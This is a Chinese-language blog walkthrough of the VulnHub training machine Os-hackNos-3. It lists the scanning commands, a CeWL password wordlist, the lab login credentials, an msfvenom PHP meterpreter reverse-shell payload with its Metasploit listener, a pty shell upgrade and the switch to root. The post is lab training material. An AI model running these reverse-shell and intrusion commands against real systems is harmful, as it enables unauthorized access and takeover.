<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Os-hackNos-3的實踐

    VSole2021-12-26 14:55:46

    好久沒做攻擊實踐了,今天看了一下,手里還攢著6個vulnhub的鏡像,算了一下,整好春節前把它們都實踐完,今天實踐的是Os-hackNos-3,

    用workstation導入成功,但是掃描不出來地址,換成virtualbox,

    sudo netdiscover -r 192.168.56.0/24,

    接著做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.104,

    發現有http服務,名字叫WebSec,猜一個url,

    http://192.168.56.104/websec/,下面發現個賬戶,

    從網頁內容里爬密碼,

    sudo cewl http://192.168.56.104/websec/ > passwd.txt,

    從頭開始試,到contact@hacknos.com/Securityx時成功,

    再猜一個url,http://192.168.56.104/websec/admin,登錄成功,

    找到一個能放反彈shell的地方,

    在kali攻擊機上生成反彈shell代碼,

    sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,

    把代碼粘到頁面上,保存提交,

    在kali攻擊機上開個反彈shell的監聽,

    msfconsole

    use exploit/multi/handler

    set payload php/meterpreter/reverse_tcp

    set LHOST 192.168.56.106

    set LPORT 4444

    run

    在頁面上再次點擊保存,反彈shell就過來了,不是root,需要提權,

    先轉成交互式shell,

    python -c 'import pty; pty.spawn("/bin/bash")',

    發現個blackdevil賬戶,又發現可能是密碼的加密數據,

    去https://www.spammimic.com/spreadsheet.php?action=decode上解密,得到blackdevil的密碼,Security@x@,

    切換到blackdevil,發現能再直接切到root,搞定,


    shellsudo
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    vulnhub之ha-natraj的實踐
    2023-05-29 15:40:49
    今天實踐的是vulnhub的ha-natraj鏡像,下載地址,https://download.vulnhu
    vulnhub之devguru的實踐
    2022-07-24 18:44:07
    今天實踐的是vulnhub的devguru鏡像,下載地址,https://download.vulnhub.
    vulnhub之darkhole2的實踐
    2022-07-10 15:32:30
    今天實踐的是vulnhub的darkhole2鏡像,下載地址,https://download.vulnhu
    快速了解 Linux Sudo 高危提權漏洞的研究利用。
    前言建議直接復制粘貼到筆記,或點贊收藏,因為時常會用到,這是整理的一些常見的反向shell和特權提升的筆記文檔,紅隊成員必會!反向shell-備忘錄 通常在獲得遠程代碼執行之后,我們希望獲得一些交互式訪問—而不是發出單個命令獲取單個回顯或與 web shell 交互
    好久沒做攻擊實踐了,今天看了一下,手里還攢著6個vulnhub的鏡像,算了一下,整好春節前把它們都實踐完,今天實踐的是Os-hackNos-3, 用workstation導入成功,但是掃描不出來地址,換成virtualbox, sudo netdiscover -r 192.168.56.0/24,
    vulnhub之cybox-1.1的實踐
    2022-08-14 12:30:50
    今天實踐的是vulnhub的cybox-1.1鏡像,下載地址,https://download.vulnhu
    描述SUID代表設置的用戶ID,是一種Linux功能,允許用戶在指定用戶的許可下執行文件。
    大多數計算機系統設計為可與多個用戶一起使用。特權是指允許用戶執行的操作。普通特權包括查看和編輯文件或修改系統文件。特權升級意味著用戶獲得他們無權獲得的特權。這些特權可用于刪除文件,查看私人信息或安裝不需要的程序,例如病毒。
    一文吃透 Linux 提權
    2021-10-23 07:09:32
    特權升級意味著用戶獲得他們無權獲得的特權。通常,當系統存在允許繞過安全性的錯誤或對使用方法的設計假設存在缺陷時,通常會發生這種情況。結果是,具有比應用程序開發人員或系統管理員想要的特權更多的應用程序可以執行未經授權的操作。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类